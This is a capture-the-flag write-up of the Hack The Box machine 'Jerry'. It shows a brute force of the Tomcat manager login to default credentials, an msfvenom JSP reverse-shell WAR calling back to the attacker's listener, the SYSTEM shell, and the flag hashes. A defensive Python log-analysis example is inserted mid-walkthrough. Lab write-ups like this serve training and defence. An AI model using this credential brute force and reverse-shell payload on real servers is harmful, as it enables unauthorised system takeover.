
HTB Jerry done

Jerry

OS:

Windows

Technology:

Apache Tomcat/Coyote JSP engine 1.1
Apache-Coyote/1.1
Apache Tomcat/7.0.88

IP Address:

10.129.143.185

Open ports:

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Users and passwords:

Tomcat
U: tomcat
P: s3cret

Nmap

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.143.185_nmap 10.129.143.185 ; cat 10.129.143.185_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 00:48 UTC
Nmap scan report for 10.129.143.185
Host is up (0.032s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Open website: http://10.129.143.185:8080/

It is the default Apache Tomcat 7.0.88 page.
I see the manager page at http://10.129.143.185:8080/manager; it asks for a login and password.

Bruteforce login and password to /manager

I use a tool from GitHub: https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce, with the wordlist /usr/share/wordlists/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
---
I found login and password:
U: tomcat
P: s3cret
___

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ git clone https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce.git
Cloning into 'Tomcat-Manager-Bruteforce'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (15/15), 4.04 KiB | 4.04 MiB/s, done.
Resolving deltas: 100% (2/2), done.

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ cd Tomcat-Manager-Bruteforce 

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Jerry/Tomcat-Manager-Bruteforce]
└─$ ls -a 
.  ..  .git  mgr_brute.py  README.md

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Jerry/Tomcat-Manager-Bruteforce]
└─$ python2 mgr_brute.py -h                                                                       
Traceback (most recent call last):
  File "mgr_brute.py", line 4, in <module>
    from termcolor import cprint
ImportError: No module named termcolor

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Jerry/Tomcat-Manager-Bruteforce]
└─$ python3 mgr_brute.py -h
usage: mgr_brute.py [-h] -U URL -P PATH -u USERNAMES -p PASSWORDS

Tomcat manager or host-manager credential bruteforcing

options:
  -h, --help            show this help message and exit
  -U URL, --url URL     URL to tomcat page
  -P PATH, --path PATH  manager or host-manager URI
  -u USERNAMES, --usernames USERNAMES
                        Users File
  -p PASSWORDS, --passwords PASSWORDS
                        Passwords Files

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Jerry/Tomcat-Manager-Bruteforce]
└─$ python3 mgr_brute.py -U http://10.129.143.185:8080/ -P manager -u ../user.txt -p ../pass.txt

[+] Atacking.....

[+] Success!!
[+] Username : b'tomcat'
[+] Password : b's3cret'

Create revshell via WAR file

Ref: https://www.hackingarticles.in/tomcat-penetration-testing/

Create payload via msfvenom

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.4 lport=4444 -f war > shell.war
Payload size: 1089 bytes
Final size of war file: 1089 bytes


┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ ls -l shell.war   
-rw-rw-r-- 1 kali kali 1089 Dec 13 20:32 shell.war

Upload revshell

Run revshell

1) Open website: http://10.129.143.185:8080/shell/

2) Start netcat:

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ netcat -vlnp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.129.143.185] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>

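As an added defender-side example (not part of this writeup, nor code from the tools or references it links), the Python below parses Tomcat's default access-log format and flags the two steps performed above: a burst of 401 responses against the manager application from one client, and a successful WAR upload through the manager. The log lines are constructed for the example; the failure threshold and time window are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
MANAGER_PREFIXES = ("/manager", "/host-manager")
# Deploy endpoints: the HTML UI upload form and the text/script interface
DEPLOY_RE = re.compile(r"^/(manager|host-manager)/(html/upload|text/deploy)(\?|$)")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_bruteforce(events, threshold=10, window_seconds=60):
    """Clients with >= threshold 401s on manager paths inside any sliding window.

    Returns {ip: max_failures_in_window}. threshold and window_seconds are
    assumed defaults; tune them to the environment.
    """
    per_ip = defaultdict(list)
    for e in events:
        if e["status"] == 401 and e["path"].startswith(MANAGER_PREFIXES):
            per_ip[e["ip"]].append(e["ts"])
    hits = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[ip] = max(hits.get(ip, 0), count)
    return hits


def find_deployments(events):
    """Successful (200) deploy/upload requests to the manager as (ip, user, endpoint)."""
    found = []
    for e in events:
        if e["status"] == 200 and e["method"] in ("POST", "PUT") and DEPLOY_RE.match(e["path"]):
            found.append((e["ip"], e["user"], e["path"].split("?", 1)[0]))
    return found


def analyse(lines, **kw):
    """Run both detections over raw log lines; unparseable lines are skipped."""
    events = [e for e in map(parse_line, lines) if e]
    return {"bruteforce": find_bruteforce(events, **kw), "deployments": find_deployments(events)}


# Constructed sample log (not real logs from the box): 12 rapid 401s from the
# attacker host, a successful login, a WAR upload, the first hit on /shell/,
# and one unrelated client with a single failed login.
SAMPLE_LOG = [
    f'10.10.14.4 - - [13/Dec/2024:00:50:{sec:02d} +0000] "GET /manager/html HTTP/1.1" 401 2473'
    for sec in range(12)
] + [
    '10.10.14.4 - tomcat [13/Dec/2024:00:50:12 +0000] "GET /manager/html HTTP/1.1" 200 17468',
    '10.10.14.4 - tomcat [13/Dec/2024:00:52:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 17920',
    '10.10.14.4 - - [13/Dec/2024:00:53:01 +0000] "GET /shell/ HTTP/1.1" 200 -',
    '10.129.0.50 - - [13/Dec/2024:01:10:00 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.129.0.50 - - [13/Dec/2024:01:10:20 +0000] "GET / HTTP/1.1" 200 11452',
]

if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for ip, n in result["bruteforce"].items():
        print(f"[!] manager brute force from {ip}: {n} failures within 60s")
    for ip, user, endpoint in result["deployments"]:
        print(f"[!] application deployed via {endpoint} by '{user}' from {ip}")
```

The single 401 from 10.129.0.50 stays below the threshold, so only the attacker host is reported; the upload is attributed to the authenticated user because Tomcat writes the Basic-auth principal into the %u field once the login succeeds.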
Read flag: root.txt / user.txt

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ netcat -vlnp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.129.143.185] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>cd C:\Users
cd C:\Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users

06/18/2018  10:31 PM    <DIR>          .
06/18/2018  10:31 PM    <DIR>          ..
06/18/2018  10:31 PM    <DIR>          Administrator
08/22/2013  05:39 PM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)   2,274,316,288 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)   2,274,316,288 bytes free

C:\Users\Administrator\Desktop>cd flags
cd flags

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,274,316,288 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e

C:\Users\Administrator\Desktop\flags>ipconfig 
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1bf
   IPv6 Address. . . . . . . . . . . : dead:beef::7486:475:dad1:91e8
   Link-local IPv6 Address . . . . . : fe80::7486:475:dad1:91e8%12
   IPv4 Address. . . . . . . . . . . : 10.129.143.185
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%12
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

C:\Users\Administrator\Desktop\flags>whoami /all
whoami /all

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner    
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled 
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled 
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Enabled 
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled 
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled 
SeCreatePagefilePrivilege       Create a pagefile                         Enabled 
SeCreatePermanentPrivilege      Create permanent shared objects           Enabled 
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeAuditPrivilege                Generate security audits                  Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Enabled 
SeTimeZonePrivilege             Change the time zone                      Enabled 
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled 


C:\Users\Administrator\Desktop\flags>

References

[Tomcat Manager Login Creds Bruteforce](https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce)
[Tomcat Penetration Testing](https://www.hackingarticles.in/tomcat-penetration-testing/)

Lessons Learned
